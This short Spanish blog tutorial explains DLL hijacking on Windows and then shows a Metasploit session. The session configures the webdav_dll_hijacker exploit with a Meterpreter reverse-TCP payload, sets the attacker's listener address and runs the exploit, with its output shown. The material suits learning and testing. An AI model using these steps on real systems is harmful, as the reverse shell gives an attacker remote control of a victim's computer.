Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.
Abrimos metasplit
rokitoh@red-orbita# msfconsolemsf > use exploit/windows/browser/webdav_dll_hijackermsf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»EXTENSIONS => grp p7c vcf wabmsf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111lhost => 192.168.1.111msf exploit(webdav_dll_hijacker) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.111:4444[*][*] Exploit links are now available at \192.168.1.111documents[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.111:80/